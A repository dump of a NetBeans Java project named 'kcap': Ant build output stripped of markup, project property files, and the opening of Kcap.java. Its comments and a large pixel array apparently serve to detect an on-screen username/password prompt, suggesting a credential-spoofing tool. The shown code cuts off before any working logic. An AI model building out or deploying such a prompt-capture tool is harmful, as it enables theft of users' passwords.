37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
94 |
95 |
96 |
97 |
98 |
99 |
100 |
101 |
102 |
103 |
104 |
105 |
106 |
107 |
108 |
109 |
110 |
111 |
112 |
113 |
114 |
115 |
116 |
117 |
118 |
119 |
120 |
121 |
122 |
123 |
124 |
125 |
126 |
127 |
128 |
129 |
130 |
131 |
132 |
133 |
134 |
135 |
136 |
137 |
138 |
139 |
140 |
141 |
142 |
143 |
144 |
145 |
146 |
147 |
148 |
149 |
150 |
151 |
152 |
153 |
154 |
155 |
156 |
157 |
158 |
159 |
160 |
161 |
162 |
163 |
164 |
165 |
166 |
167 |
168 |
169 |
170 |
171 |
172 |
173 |
174 |
175 |
176 |
177 |
178 |
179 |
180 |
181 |
182 |
183 |
184 |
185 |
186 |
187 |
188 |
189 |
190 |
191 |
192 |
193 |
194 |
195 |
196 |
197 |
198 |
199 |
200 |
201 |
202 |
203 |
204 |
205 |
206 |
207 |
208 |
209 |
210 |
211 |
212 |
213 |
214 |
215 |
216 |
217 |
218 |
219 |
220 |
221 |
222 |
223 |
224 |
225 |
226 |
227 |
228 |
229 |
230 |
231 |
232 | Must set src.dir
233 | Must set test.src.dir
234 | Must set build.dir
235 | Must set dist.dir
236 | Must set build.classes.dir
237 | Must set dist.javadoc.dir
238 | Must set build.test.classes.dir
239 | Must set build.test.results.dir
240 | Must set build.classes.excludes
241 | Must set dist.jar
242 |
243 |
244 |
245 |
246 |
247 |
248 |
249 |
250 |
251 |
252 |
253 |
254 |
255 |
256 |
257 |
258 |
259 |
260 |
261 |
262 |
263 |
264 |
265 |
266 |
267 |
268 |
269 |
270 |
271 |
272 |
273 |
274 |
275 |
276 |
277 |
278 |
279 |
280 |
281 |
282 |
283 |
284 |
285 |
286 |
287 |
288 |
289 |
290 |
291 |
292 |
293 |
294 |
295 |
296 |
297 |
298 |
299 |
300 |
301 |
302 |
303 |
304 |
305 |
306 |
307 |
308 |
309 |
310 |
311 |
312 |
313 |
314 |
315 |
316 |
317 |
318 |
319 |
320 |
321 |
322 |
323 |
324 |
325 |
326 |
327 |
328 |
329 |
330 |
331 |
332 |
333 |
334 |
335 |
336 |
337 |
338 |
339 |
340 |
341 |
342 | Must set javac.includes
343 |
344 |
345 |
346 |
347 |
348 |
349 |
350 |
351 |
352 |
353 |
354 |
355 |
356 |
357 |
358 |
359 |
360 |
361 |
362 |
363 |
364 |
365 |
366 |
367 |
368 |
369 |
370 |
371 |
372 |
373 |
374 |
375 |
376 |
377 |
378 |
379 |
380 |
381 |
382 |
383 |
384 |
385 |
386 |
387 |
388 |
389 |
390 |
391 |
392 |
393 |
394 |
395 |
396 |
397 |
398 |
399 |
400 |
401 |
402 |
403 |
404 |
405 |
406 |
407 |
408 |
409 |
410 |
411 |
412 |
413 |
414 |
415 |
416 |
417 |
418 |
419 |
420 |
421 |
422 |
423 |
424 |
425 |
426 |
427 |
428 |
429 |
430 |
431 |
432 |
433 |
434 |
435 |
436 |
437 |
438 |
439 |
440 |
441 |
442 |
443 |
444 |
445 |
446 |
447 |
448 |
449 |
450 |
451 |
452 |
453 |
454 |
455 |
456 |
457 |
458 |
459 |
460 |
461 |
462 |
463 |
464 |
465 |
466 |
467 |
468 |
469 |
470 |
471 | No tests executed.
472 |
473 |
474 |
475 |
476 |
477 |
478 |
479 |
480 |
481 |
482 |
483 |
484 |
485 |
486 |
487 |
488 |
489 |
490 |
491 |
492 |
493 |
494 |
495 |
496 |
497 |
498 |
499 |
500 |
501 |
502 |
503 |
504 |
505 |
506 |
507 |
508 |
509 |
510 |
511 |
512 |
513 |
514 |
515 |
516 |
517 |
518 |
519 |
520 |
521 |
522 |
523 |
524 |
525 |
526 |
527 |
528 |
529 |
530 |
531 |
532 |
533 |
534 |
535 |
536 |
537 |
538 |
539 |
540 |
541 |
542 |
543 |
544 |
545 |
546 |
547 |
548 |
549 |
550 |
551 |
552 |
553 |
554 |
555 |
556 |
557 |
558 |
559 |
560 |
561 |
562 |
563 |
564 |
565 |
566 |
567 |
568 |
569 |
570 |
571 |
572 |
573 |
574 |
575 |
576 |
577 |
578 |
579 |
580 |
581 |
582 |
583 |
584 |
585 |
586 |
587 |
588 |
589 |
590 |
591 |
592 |
593 |
594 |
595 |
596 |
597 |
598 |
599 |
600 |
601 |
602 |
603 |
604 |
605 |
606 |
607 |
608 |
609 |
610 |
611 |
612 |
613 |
614 |
615 |
616 |
617 |
618 |
619 |
620 |
621 |
622 |
623 |
624 |
625 |
626 |
627 |
628 |
629 |
630 |
631 |
632 |
633 |
634 |
635 |
636 |
637 |
638 |
639 |
640 |
641 |
642 |
643 |
644 |
645 |
646 |
647 |
648 |
649 |
650 |
651 |
652 |
653 |
654 |
655 |
656 |
657 |
658 |
659 |
660 |
661 |
662 |
663 |
664 |
665 |
666 |
667 |
668 |
669 |
670 |
671 |
672 |
673 |
674 |
675 |
676 |
679 |
680 |
681 |
682 |
683 |
684 |
685 |
686 |
687 |
688 |
689 |
690 |
691 |
692 |
693 |
694 |
695 |
696 |
697 |
698 |
699 |
700 |
701 |
702 |
703 |
704 |
705 |
706 |
707 |
708 |
709 |
710 |
711 |
712 |
713 |
714 |
715 |
716 |
717 |
718 |
719 |
720 |
721 | Must set JVM to use for profiling in profiler.info.jvm
722 | Must set profiler agent JVM arguments in profiler.info.jvmargs.agent
723 |
724 |
727 |
728 |
729 |
730 |
731 |
732 |
733 |
734 |
735 |
736 |
737 |
738 |
739 |
740 |
741 |
742 |
743 |
744 |
745 |
746 |
747 |
748 |
749 |
750 |
751 |
752 |
753 |
754 |
755 |
756 |
757 |
758 |
759 |
760 |
761 |
762 |
763 |
764 |
765 |
766 |
767 |
768 |
769 |
770 |
771 |
772 |
773 |
774 |
775 |
776 |
777 |
778 |
779 |
780 |
781 |
782 |
783 |
784 |
785 |
786 |
787 |
788 |
789 |
790 |
791 |
792 |
793 |
794 |
795 |
796 |
797 |
798 |
799 |
800 |
801 |
802 |
803 |
804 |
805 |
806 |
807 |
808 |
809 |
810 |
811 |
812 |
813 |
814 |
815 |
816 |
817 |
818 |
819 |
820 |
821 |
822 |
823 |
824 |
825 |
826 |
827 |
828 |
829 |
830 |
831 |
832 |
833 |
834 |
835 |
836 |
837 |
838 |
839 |
840 |
841 |
842 |
843 |
844 |
845 |
846 |
847 |
848 |
849 |
850 |
851 |
852 |
853 |
854 |
855 |
856 |
857 |
858 |
859 |
860 |
861 |
862 |
863 |
864 |
865 |
866 |
867 |
868 |
869 |
870 |
871 |
872 |
873 |
874 |
875 |
876 |
877 |
878 |
879 |
880 |
881 |
882 |
883 |
884 |
885 |
890 |
891 |
892 |
893 |
894 |
895 |
896 |
897 |
898 |
899 |
900 |
901 |
902 |
903 |
904 |
905 |
906 |
907 |
908 |
909 |
910 |
911 |
912 |
913 |
914 |
915 |
916 |
917 |
918 |
919 |
920 |
921 |
922 |
923 |
924 |
925 |
926 |
927 |
928 |
929 |
930 |
931 |
932 |
933 |
934 |
935 |
936 |
937 |
938 |
939 |
940 |
941 |
942 |
943 |
944 |
945 |
946 |
947 |
948 |
949 |
950 | Must select some files in the IDE or set javac.includes
951 |
952 |
953 |
954 |
955 |
956 |
957 |
958 |
959 |
964 |
965 |
966 |
967 |
968 |
969 |
970 |
971 |
972 |
973 |
974 |
975 |
976 |
977 |
978 |
979 |
980 |
981 |
982 |
983 |
984 |
985 |
986 |
987 |
988 |
989 |
990 |
991 |
992 |
993 |
994 |
995 |
996 |
997 |
998 |
999 |
1000 | To run this application from the command line without Ant, try:
1001 |
1002 | java -jar "${dist.jar.resolved}"
1003 |
1004 |
1005 |
1006 |
1007 |
1008 |
1009 |
1010 |
1011 |
1012 |
1013 |
1014 |
1015 |
1016 |
1017 |
1018 |
1019 |
1020 |
1021 |
1022 |
1023 |
1024 |
1025 |
1026 |
1027 |
1028 |
1029 |
1030 |
1031 |
1032 |
1033 |
1038 |
1039 |
1040 |
1041 |
1042 |
1043 |
1044 |
1045 |
1046 |
1047 |
1048 |
1049 | Must select one file in the IDE or set run.class
1050 |
1051 |
1052 |
1053 | Must select one file in the IDE or set run.class
1054 |
1055 |
1056 |
1061 |
1062 |
1063 |
1064 |
1065 |
1066 |
1067 |
1068 |
1069 |
1070 |
1071 |
1072 |
1073 |
1074 |
1075 |
1076 |
1077 |
1078 |
1079 |
1080 | Must select one file in the IDE or set debug.class
1081 |
1082 |
1083 |
1084 |
1085 | Must select one file in the IDE or set debug.class
1086 |
1087 |
1088 |
1089 |
1090 | Must set fix.includes
1091 |
1092 |
1093 |
1094 |
1095 |
1096 |
1097 |
1102 |
1105 |
1106 | This target only works when run from inside the NetBeans IDE.
1107 |
1108 |
1109 |
1110 |
1111 |
1112 |
1113 |
1114 |
1115 | Must select one file in the IDE or set profile.class
1116 | This target only works when run from inside the NetBeans IDE.
1117 |
1118 |
1119 |
1120 |
1121 |
1122 |
1123 |
1124 |
1125 | This target only works when run from inside the NetBeans IDE.
1126 |
1127 |
1128 |
1129 |
1130 |
1131 |
1132 |
1133 |
1134 |
1135 |
1136 |
1137 |
1138 | This target only works when run from inside the NetBeans IDE.
1139 |
1140 |
1141 |
1142 |
1143 |
1144 |
1145 |
1146 |
1147 |
1148 |
1149 |
1150 |
1151 |
1152 |
1153 |
1154 |
1155 |
1156 |
1157 |
1158 |
1159 |
1160 |
1163 |
1164 |
1165 |
1166 |
1167 |
1168 |
1169 |
1170 |
1171 |
1172 |
1173 |
1174 |
1175 |
1176 | Must select one file in the IDE or set run.class
1177 |
1178 |
1179 |
1180 |
1181 |
1182 | Must select some files in the IDE or set test.includes
1183 |
1184 |
1185 |
1186 |
1187 | Must select one file in the IDE or set run.class
1188 |
1189 |
1190 |
1191 |
1192 | Must select one file in the IDE or set applet.url
1193 |
1194 |
1195 |
1196 |
1201 |
1202 |
1203 |
1204 |
1205 |
1206 |
1207 |
1208 |
1209 |
1210 |
1211 |
1212 |
1213 |
1214 |
1215 |
1216 |
1217 |
1218 |
1219 |
1220 |
1221 |
1222 |
1223 |
1224 |
1225 |
1226 |
1227 |
1228 |
1229 |
1230 |
1231 |
1232 |
1233 |
1234 |
1235 |
1236 |
1237 |
1238 |
1239 |
1240 |
1245 |
1246 |
1247 |
1248 |
1249 |
1250 |
1251 |
1252 |
1253 |
1254 |
1255 |
1256 |
1257 |
1258 |
1259 |
1260 |
1261 |
1262 |
1263 |
1264 |
1265 |
1266 |
1267 |
1268 |
1269 |
1270 |
1271 | Must select some files in the IDE or set javac.includes
1272 |
1273 |
1274 |
1275 |
1276 |
1277 |
1278 |
1279 |
1280 |
1281 |
1282 |
1283 |
1288 |
1289 |
1290 |
1291 |
1292 |
1293 |
1294 |
1295 | Some tests failed; see details above.
1296 |
1297 |
1298 |
1299 |
1300 |
1301 |
1302 |
1303 |
1304 | Must select some files in the IDE or set test.includes
1305 |
1306 |
1307 |
1308 | Some tests failed; see details above.
1309 |
1310 |
1311 |
1312 | Must select some files in the IDE or set test.class
1313 | Must select some method in the IDE or set test.method
1314 |
1315 |
1316 |
1317 | Some tests failed; see details above.
1318 |
1319 |
1320 |
1325 |
1326 | Must select one file in the IDE or set test.class
1327 |
1328 |
1329 |
1330 | Must select one file in the IDE or set test.class
1331 | Must select some method in the IDE or set test.method
1332 |
1333 |
1334 |
1335 |
1336 |
1337 |
1338 |
1339 |
1340 |
1341 |
1342 |
1343 |
1348 |
1349 | Must select one file in the IDE or set applet.url
1350 |
1351 |
1352 |
1353 |
1354 |
1355 |
1356 |
1361 |
1362 | Must select one file in the IDE or set applet.url
1363 |
1364 |
1365 |
1366 |
1367 |
1368 |
1369 |
1370 |
1375 |
1376 |
1377 |
1378 |
1379 |
1380 |
1381 |
1382 |
1383 |
1384 |
1385 |
1386 |
1387 |
1388 |
1389 |
1390 |
1391 |
1392 |
1393 |
1394 |
1395 |
1396 |
1397 |
1398 |
1399 |
1400 |
1401 |
1402 |
1403 |
1404 |
1405 |
1406 |
1407 |
1408 |
1409 |
1410 |
1411 |
1412 |
1413 |
1414 |
1415 |
1416 |
1417 |
1418 |
1419 |
1420 |
--------------------------------------------------------------------------------
/kcap/nbproject/genfiles.properties:
--------------------------------------------------------------------------------
1 | build.xml.data.CRC32=0b8c4aea
2 | build.xml.script.CRC32=f3c69bbe
3 | build.xml.stylesheet.CRC32=8064a381@1.79.1.48
4 | # This file is used by a NetBeans-based IDE to track changes in generated files such as build-impl.xml.
5 | # Do not edit this file. You may delete it but then the IDE will never regenerate such files for you.
6 | nbproject/build-impl.xml.data.CRC32=0b8c4aea
7 | nbproject/build-impl.xml.script.CRC32=fee5d2c6
8 | nbproject/build-impl.xml.stylesheet.CRC32=05530350@1.79.1.48
9 |
--------------------------------------------------------------------------------
/kcap/nbproject/project.properties:
--------------------------------------------------------------------------------
1 | annotation.processing.enabled=true
2 | annotation.processing.enabled.in.editor=false
3 | annotation.processing.processor.options=
4 | annotation.processing.processors.list=
5 | annotation.processing.run.all.processors=true
6 | annotation.processing.source.output=${build.generated.sources.dir}/ap-source-output
7 | build.classes.dir=${build.dir}/classes
8 | build.classes.excludes=**/*.java,**/*.form
9 | # This directory is removed when the project is cleaned:
10 | build.dir=build
11 | build.generated.dir=${build.dir}/generated
12 | build.generated.sources.dir=${build.dir}/generated-sources
13 | # Only compile against the classpath explicitly listed here:
14 | build.sysclasspath=ignore
15 | build.test.classes.dir=${build.dir}/test/classes
16 | build.test.results.dir=${build.dir}/test/results
17 | # Uncomment to specify the preferred debugger connection transport:
18 | #debug.transport=dt_socket
19 | debug.classpath=\
20 | ${run.classpath}
21 | debug.test.classpath=\
22 | ${run.test.classpath}
23 | # Files in build.classes.dir which should be excluded from distribution jar
24 | dist.archive.excludes=
25 | # This directory is removed when the project is cleaned:
26 | dist.dir=dist
27 | dist.jar=${dist.dir}/kcap.jar
28 | dist.javadoc.dir=${dist.dir}/javadoc
29 | excludes=
30 | includes=**
31 | jar.compress=false
32 | javac.classpath=
33 | # Space-separated list of extra javac options
34 | javac.compilerargs=
35 | javac.deprecation=false
36 | javac.external.vm=true
37 | javac.processorpath=\
38 | ${javac.classpath}
39 | javac.source=1.8
40 | javac.target=1.8
41 | javac.test.classpath=\
42 | ${javac.classpath}:\
43 | ${build.classes.dir}
44 | javac.test.processorpath=\
45 | ${javac.test.classpath}
46 | javadoc.additionalparam=
47 | javadoc.author=false
48 | javadoc.encoding=${source.encoding}
49 | javadoc.noindex=false
50 | javadoc.nonavbar=false
51 | javadoc.notree=false
52 | javadoc.private=false
53 | javadoc.splitindex=true
54 | javadoc.use=true
55 | javadoc.version=false
56 | javadoc.windowtitle=
57 | main.class=kcap.Kcap
58 | manifest.file=manifest.mf
59 | meta.inf.dir=${src.dir}/META-INF
60 | mkdist.disabled=false
61 | platform.active=default_platform
62 | run.classpath=\
63 | ${javac.classpath}:\
64 | ${build.classes.dir}
65 | # Space-separated list of JVM arguments used when running the project.
66 | # You may also define separate properties like run-sys-prop.name=value instead of -Dname=value.
67 | # To set system properties for unit tests define test-sys-prop.name=value:
68 | run.jvmargs=
69 | run.test.classpath=\
70 | ${javac.test.classpath}:\
71 | ${build.test.classes.dir}
72 | source.encoding=UTF-8
73 | src.dir=src
74 | test.src.dir=test
75 |
--------------------------------------------------------------------------------
/kcap/nbproject/project.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 | org.netbeans.modules.java.j2seproject
4 |
5 |
6 | kcap
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
--------------------------------------------------------------------------------
/kcap/src/kcap/Kcap.java:
--------------------------------------------------------------------------------
1 | package kcap;
2 | import java.awt.*;
3 | import java.awt.event.*;
4 | import java.awt.image.*;
5 | import javax.swing.*;
6 | /**
7 | * @author scriptjunkie
8 | */
9 | public class Kcap {
10 | private static Point triggerLoc; //where they clicked to get the password prompt
11 | private static final int REF_WIDTH = 64; // the width of the below pixel array
12 | private static Rectangle popupRect; //The location & dimensions of the password popup
13 | private static Rectangle sr; //The screen
14 | private static final int[] USERPASS_PIXELS = new int[]{693, 350, 157, 682, 693, 693, 693, 511, 131, 682, 660, 307, 0, 0, 223, 628, 693, 693, 476, 52, 0, 77, 535, 693, 633, 181, 374, 0, 150, 617, 181, 412, 34, 0, 220, 642, 693, 598, 199, 0, 0, 290, 672, 685, 269, 298, 124, 0, 230, 560, 101, 0, 115, 584, 693, 693, 476, 52, 0, 77, 535, 693, 693, 501, 693, 350, 157, 682, 693, 693, 693, 511, 131, 682, 428, 64, 525, 570, 92, 267, 693, 518, 0, 360, 560, 282, 0, 583, 629, 68, 64, 451, 560, 629, 68, 77, 515, 474, 52, 350, 685, 185, 97, 562, 492, 52, 371, 680, 197, 0, 431, 480, 68, 0, 419, 521, 92, 247, 689, 518, 0, 360, 560, 282, 0, 583, 640, 68, 693, 350, 157, 682, 693, 693, 693, 511, 131, 682, 359, 64, 552, 679, 693, 678, 693, 299, 150, 658, 669, 613, 68, 483, 629, 68, 511, 693, 693, 629, 68, 511, 693, 693, 311, 200, 682, 683, 674, 669, 650, 215, 341, 680, 179, 311, 693, 693, 311, 229, 693, 693, 364, 150, 678, 299, 150, 658, 669, 613, 68, 483, 693, 572, 693, 350, 178, 682, 693, 693, 693, 457, 150, 682, 638, 235, 0, 0, 145, 557, 675, 179, 0, 0, 0, 0, 0, 350, 629, 52, 513, 693, 693, 629, 52, 513, 693, 693, 359, 150, 672, 421, 0, 0, 0, 0, 357, 680, 179, 350, 693, 693, 342, 341, 693, 693, 350, 157, 662, 179, 0, 0, 0, 0, 0, 350, 693, 693, 693, 381, 87, 660, 693, 693, 693, 299, 150, 678, 693, 693, 678, 594, 142, 150, 678, 311, 181, 685, 693, 693, 654, 679, 629, 52, 513, 693, 693, 629, 52, 513, 693, 693, 350, 157, 611, 52, 401, 689, 685, 204, 341, 680, 179, 350, 693, 693, 337, 331, 693, 693, 350, 157, 682, 311, 181, 685, 693, 693, 654, 679, 693, 693, 693, 569, 0, 231, 583, 626, 379, 0, 367, 693, 268, 87, 589, 639, 190, 181, 682, 446, 0, 404, 645, 427, 0, 529, 629, 52, 513, 693, 693, 629, 52, 513, 693, 693, 350, 150, 611, 52, 364, 621, 417, 0, 357, 680, 179, 350, 693, 693, 337, 331, 693, 693, 350, 157, 682, 446, 0, 404, 645, 427, 0, 529, 675, 236, 693, 693, 510, 68, 0, 0, 0, 356, 682, 693, 603, 138, 0, 0, 115, 556, 693, 688, 402, 0, 0, 0, 390, 689, 629, 68, 529, 693, 693, 629, 68, 529, 693, 693, 359, 181, 677, 402, 0, 0, 152, 232, 350, 680, 197, 350, 693, 693, 342, 331, 693, 693, 359, 178, 682, 688, 402, 0, 0, 0, 390, 689, 661, 142, 693, 693, 693, 688, 625, 611, 666, 693, 693, 693, 693, 693, 663, 654, 693, 693, 693, 693, 693, 678, 651, 679, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 678, 663, 689, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 678, 651, 679, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 685, 473, 418, 426, 426, 478, 667, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 535, 77, 640, 693, 693, 693, 693, 693, 693, 680, 179, 0, 0, 0, 0, 106, 654, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 518, 52, 625, 693, 693, 693, 693, 693, 693, 680, 157, 507, 693, 693, 499, 0, 392, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 693, 678, 693, 533, 52, 629, 693, 693, 693, 693, 693, 693, 680, 157, 507, 693, 693, 685, 185, 341, 693, 470, 68, 0, 34, 446, 693, 693, 453, 52, 0, 97, 508, 693, 660, 307, 0, 0, 223, 628, 376, 259, 685, 688, 305, 236, 682, 693, 333, 320, 693, 598, 158, 0, 0, 320, 678, 685, 269, 282, 115, 34, 625, 577, 115, 0, 115, 344, 64, 629, 693, 501, 693, 693, 693, 693, 680, 157, 521, 693, 693, 675, 157, 326, 619, 34, 302, 598, 364, 0, 583, 613, 34, 393, 617, 266, 77, 645, 428, 64, 525, 570, 92, 267, 472, 77, 650, 649, 92, 64, 629, 665, 110, 432, 649, 101, 152, 534, 458, 34, 259, 676, 197, 0, 353, 534, 633, 92, 152, 524, 424, 0, 64, 629, 640, 68, 693, 693, 693, 693, 680, 179, 347, 499, 471, 216, 0, 523, 693, 678, 678, 663, 588, 52, 507, 586, 0, 404, 661, 693, 678, 689, 359, 64, 552, 679, 693, 678, 623, 52, 560, 549, 34, 52, 498, 597, 0, 600, 511, 34, 614, 693, 693, 446, 87, 630, 179, 300, 693, 693, 511, 34, 614, 693, 693, 409, 64, 629, 693, 572, 693, 693, 693, 693, 680, 190, 0, 96, 34, 189, 529, 693, 650, 258, 0, 0, 0, 0, 513, 685, 389, 0, 0, 52, 430, 689, 638, 235, 0, 0, 145, 557, 685, 185, 409, 350, 335, 373, 300, 455, 123, 678, 518, 64, 629, 693, 693, 529, 52, 611, 179, 350, 693, 693, 518, 64, 629, 693, 693, 535, 52, 629, 693, 693, 693, 693, 693, 693, 680, 157, 511, 693, 693, 693, 693, 693, 440, 64, 574, 693, 619, 52, 513, 693, 693, 693, 631, 368, 0, 578, 693, 693, 678, 594, 142, 150, 678, 409, 145, 115, 527, 562, 64, 170, 350, 693, 506, 52, 625, 693, 693, 475, 52, 611, 179, 350, 693, 693, 506, 52, 625, 693, 693, 431, 64, 629, 